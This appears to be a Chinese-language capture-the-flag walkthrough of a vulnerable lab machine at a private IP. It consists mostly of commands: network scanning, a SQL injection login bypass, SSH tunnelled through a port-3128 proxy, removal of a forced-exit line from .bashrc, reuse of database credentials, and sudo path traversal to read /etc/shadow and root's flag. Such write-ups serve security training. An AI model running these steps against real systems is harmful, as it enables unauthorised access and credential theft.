主机发现
arp-scan -l
端口扫描
nmap -sV -sC -sT -O 192.168.215.200 -p-
浏览器访问
emil随便输 ,密码输入:
123'|| 1=1 #
登录进去后显示用户名和密码
getshell
尝试 ssh 连接 ,但是连接不上, 但是还开放了一个 3128 端口 ,应该是ssh的代理端口,
我们编辑代理试试
vim /etc/proxychains4.conf
开启一个代理
proxytunnel -a 6666 -p 192.168.215.200:3128 -d 192.168.215.200:22
#
-a 指定本地侦听端口
-p 使用代理IP和端口
-d 指定访问的目标和端口
ssh john@127.0.0.1 -p6666
但是我们会被踢下来
通过执行 /bin/bash 获取交换界面
ssh john@127.0.0.1 -p6666 /bin/bash
连接成功
查看一下 /bashrc 文件 ,是否配置了 john 用户不能登录
将 exit 删掉
sed -i '$d' .bashrc
成功删掉
此时重新登录便可登录成功
提权
sudo -l
发现 内核不能提权
只能尝试登录MySQL数据库看有没有其他用户信息
cd /var/www
ls
cat login.php
mysql -uroot -proot # 登录MySQL数据库
use SKyTech; # 选择 这个库
show tables; # 查看表
selec * from login # 查看表里的数据
继续连接sara 用户,重复之前的操作
ssh sara@127.0.0.1 -p6666 /bin/bash
sed -i '$d' .bashrc
ssh sara@127.0.0.1 -p6666
sudo -l
发现可以在/accounts/*使用使用root的cat和ls命令
sudo cat /accounts/../etc/shadow
sudo /bin/ls /accounts/ ../../root # 查看root下有什么文件
发现flag.txt
sudo /bin/cat /accounts/ ../../root/flag.txt # 查看它
找到 root 用户 的密码是 theskytower
su root # 切换root 用户
提权成功